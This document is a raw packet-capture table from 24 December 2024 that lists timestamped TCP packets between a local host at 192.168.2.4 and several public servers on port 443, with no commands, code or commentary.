                                                                                        Dec 24, 2024 09:17:46.722819090 CET44349758192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:46.723956108 CET49758443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:46.724246025 CET49758443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:46.724267006 CET44349758192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.524029970 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.524422884 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:47.524491072 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.524789095 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.525381088 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:47.525451899 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.525559902 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:47.528073072 CET44349759172.217.21.36192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.528300047 CET49759443192.168.2.4172.217.21.36
                                                                                        Dec 24, 2024 09:17:47.528337955 CET44349759172.217.21.36192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.529247046 CET44349759172.217.21.36192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.529314995 CET49759443192.168.2.4172.217.21.36
                                                                                        Dec 24, 2024 09:17:47.530252934 CET49759443192.168.2.4172.217.21.36
                                                                                        Dec 24, 2024 09:17:47.530353069 CET44349759172.217.21.36192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.571335077 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.575592995 CET49759443192.168.2.4172.217.21.36
                                                                                        Dec 24, 2024 09:17:47.575627089 CET44349759172.217.21.36192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.621146917 CET49759443192.168.2.4172.217.21.36
                                                                                        Dec 24, 2024 09:17:47.966521978 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.966563940 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.966593027 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.966615915 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.966644049 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:47.966655970 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.966725111 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.966763020 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:47.966784000 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:47.966798067 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.975265980 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.975349903 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:47.975373983 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.983165026 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:47.983242035 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:47.983257055 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.031804085 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.031822920 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.079062939 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.158668995 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.162302971 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.162384987 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.162414074 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.173077106 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.173154116 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.173160076 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.173185110 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.173234940 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.181027889 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.188679934 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.188751936 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.188766956 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.196605921 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.196664095 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.196679115 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.204394102 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.204472065 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.204487085 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.212157011 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.212248087 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.212265968 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.219939947 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.220031977 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.220048904 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.235414982 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.235481977 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.235497952 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.280011892 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.280044079 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.326056004 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.350729942 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.354506016 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.354609013 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.354645014 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.362129927 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.362243891 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.362248898 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.362297058 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.362802029 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.362828016 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.508143902 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:48.508197069 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.508285999 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:48.508502007 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:48.508516073 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.517429113 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.517491102 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.517563105 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.517734051 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:48.517752886 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:49.731506109 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:49.731959105 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:49.731976032 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:49.732888937 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:49.732996941 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:49.733405113 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:49.733473063 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:49.733639002 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:49.733645916 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:49.738172054 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:49.738394022 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:49.738447905 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:49.739340067 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:49.739418030 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:49.739721060 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:49.739783049 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:49.739851952 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:49.739867926 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:49.776638985 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:49.792604923 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.183775902 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.183856964 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.183887005 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.183952093 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.184001923 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.184047937 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.184442997 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.184505939 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.184528112 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.184554100 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.184568882 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.184581041 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.184611082 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.184643030 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.184690952 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.184705019 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.192073107 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.192838907 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.192910910 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.192922115 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.200377941 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.200403929 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.200460911 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.200489044 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.200530052 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.208648920 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.209340096 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.209410906 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.209425926 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.230885029 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.230943918 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.231034040 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.231324911 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.231334925 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.254648924 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.254650116 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.303406000 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.303986073 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.307564974 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.307660103 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.307725906 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.355755091 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.355762959 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.355772018 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.375385046 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.380480051 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.380565882 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.380579948 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.380610943 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.380673885 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.380701065 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.382132053 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.382181883 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.382191896 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.388612986 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.388704062 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.388721943 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.396536112 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.396621943 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.396640062 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.398921013 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.398966074 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.398999929 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.399015903 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.399055004 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.404123068 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.404201984 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.404202938 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.404246092 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.404963970 CET49762443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.405004978 CET44349762104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.407401085 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.413362026 CET49764443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.413409948 CET44349764104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.413492918 CET49764443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.413814068 CET49764443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:50.413831949 CET44349764104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.415627003 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.415693998 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.415707111 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.424051046 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.424108982 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.424118042 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.432543993 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.432626009 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.432635069 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.440906048 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.440995932 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.441005945 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.447504044 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.447571993 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.447582960 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.453778982 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.453857899 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.453870058 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.466588020 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.466634989 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.466669083 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.466687918 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.466705084 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.466748953 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:50.466749907 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.466800928 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.467025042 CET49761443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:50.467044115 CET44349761104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.514985085 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.515347958 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:51.515377998 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.516611099 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.516917944 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:51.517056942 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:51.517065048 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.517102003 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.560638905 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:51.628563881 CET44349764104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.628957033 CET49764443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:51.628981113 CET44349764104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.629271030 CET44349764104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.629565954 CET49764443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:51.629617929 CET44349764104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.629699945 CET49764443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:51.675333977 CET44349764104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.954231024 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.954361916 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.954425097 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:51.954452038 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.954533100 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.954582930 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:51.954590082 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.954684973 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.954736948 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:51.954744101 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.962213039 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.962285995 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:51.962294102 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.979022980 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:51.979172945 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:51.979181051 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.030348063 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.073379993 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.087594032 CET44349764104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.087658882 CET44349764104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.087801933 CET49764443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.088468075 CET49764443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.088481903 CET44349764104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.092173100 CET49765443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:52.092207909 CET44349765104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.092314959 CET49765443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:52.092514992 CET49765443192.168.2.4104.18.95.41
                                                                                        Dec 24, 2024 09:17:52.092525959 CET44349765104.18.95.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.124429941 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.124443054 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.149310112 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.149398088 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.149410963 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.158948898 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.159006119 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.159013987 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.166919947 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.166974068 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.166980982 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.174968958 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.175029039 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.175035954 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.182830095 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.182895899 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.182910919 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.190793991 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.190911055 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.190917969 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.198926926 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.198986053 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.198992968 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.206897020 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.206979990 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.206988096 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.214879990 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.214951992 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.214958906 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.227659941 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.227766991 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.227776051 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.234247923 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.234325886 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.234337091 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.281661034 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.337449074 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.340585947 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.340648890 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.340656996 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.345367908 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.345432043 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.345439911 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.350152016 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.350261927 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.350269079 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.359430075 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.359508991 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.359517097 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.359565020 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.367969036 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.367991924 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.368052006 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.376601934 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.376621962 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.376673937 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.376682043 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.376733065 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.381016970 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.381033897 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.381098032 CET49763443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:52.389669895 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.389687061 CET44349763104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:52.389754057 CET49763443192.168.2.4104.18.94.41
